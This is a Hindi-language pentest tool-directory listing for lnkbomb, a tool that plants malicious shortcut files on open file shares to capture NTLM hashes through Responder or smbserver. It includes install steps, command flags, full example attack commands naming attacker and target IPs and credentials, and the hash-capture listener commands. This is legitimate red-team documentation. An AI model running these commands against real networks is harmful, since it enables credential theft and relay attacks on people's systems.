Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/dievus/lnkbomb
पासवर्ड हमलेशोषणपार्श्व आंदोलनजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगरेड टीमिंगArchived
GitHubdievus/lnkbomb

lnkbomb

असुरक्षित फ़ाइल शेयरों से NTLM हैश एकत्र करने के लिए दुर्भावनापूर्ण शॉर्टकट जनरेटर

रिपॉजिटरी देखें
363621 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Lnkbomb

ko-fi

Lnkbomb का उपयोग असुरक्षित फ़ाइल शेयरों में दुर्भावनापूर्ण शॉर्टकट फ़ाइलें अपलोड करने के लिए किया जाता है। यह कमज़ोरी इसलिए मौजूद है क्योंकि Windows शॉर्टकट फ़ाइल से संबद्ध करने के लिए एक आइकन फ़ाइल की तलाश करता है। इस आइकन फ़ाइल को पेनिट्रेशन टेस्टर की मशीन पर चल रहे Responder या smbserver की ओर निर्देशित किया जा सकता है, ताकि (पीड़ित होस्ट मशीन के कॉन्फ़िगरेशन के अनुसार) NTLMv1 या NTLMv2 हैश एकत्र किए जा सकें। टेस्टर फिर उन एकत्रित हैश को Hashcat जैसे टूल से ऑफ़लाइन क्रैक कर सकता है, या उन्हें आगे के शोषण के लिए ntlmrelayx जैसे टूल पर रिले कर सकता है।

पेलोड फ़ाइल सीधे टेस्टर द्वारा कमांड लाइन में निर्दिष्ट असुरक्षित फ़ाइल पर अपलोड की जाती है। टेस्टर अपना IP पता भी शामिल करता है, जो पेलोड में लिखा जाता है।

संस्करण 2.0 टूल का पूर्ण पुनर्निर्माण है और pysmb लाइब्रेरी का उपयोग करता है, जो बिना प्रमाणीकरण और प्रमाणीकृत पेलोड ड्रॉप की अनुमति देता है।

पायथन उपयोग

Lnkbomb स्थापित करना

ध्यान दें कि यह प्रोजेक्ट Windows में लगातार काम करता है। Linux में इसमें समस्याएँ हो सकती हैं।

git clone https://github.com/dievus/lnkbomb.git

निर्देशिका को lnkbomb में बदलें और चलाएँ:

python3 lnkbomb.py -h

यह सहायता मेनू आउटपुट करेगा, जिसमें निम्नलिखित फ़्लैग होंगे:

-h, --help - Lists the help options

-t, --target - Specifies the target IP address

-a, --attacker - Specifies the tester's attack machine IP address

-r, --recover - Used to remove the payload when testing is completed (ex. -r payloadname.url)

-w, --windows - New command - required for setting appropriate ports for Windows shares

-l, --linux - New command - required for setting appropriate ports for Linux shares

-n, --netbios - New command - netbios name for targeted Windows machines must be included

पूर्ण कमांड के उदाहरणों में शामिल हैं:

python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows

python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows -r dicnwdsebl.url

आपको NTLM हैश कैप्चर करने के लिए Responder या smbserver जैसे टूल का उपयोग करना होगा।
responder -I eth0 -dwFP -v

या

smbserver.py . . -smb2support

नोट्स

कृपया याद रखें कि यह टूल केवल एथिकल हैकिंग और पेनिट्रेशन टेस्टिंग उद्देश्यों के लिए बनाया गया है। मैं किसी भी ऐसे व्यवहार का समर्थन नहीं करता जिसमें उन लक्ष्यों का परीक्षण शामिल हो जिनके विरुद्ध परीक्षण करने की आपके पास वर्तमान में अनुमति नहीं है।

लक्ष्य पैचिंग और वर्जनिंग के आधार पर यह टूल काम कर भी सकता है और नहीं भी। उपयोगकर्ता अनुभव भिन्न हो सकता है।

मुझे पता है कि ये .url शॉर्टकट हैं, .lnk एक्सटेंशन नहीं। मैं आपको ट्रिगर करने के लिए ऐसा करता हूँ।

टूल डाउनलोड करें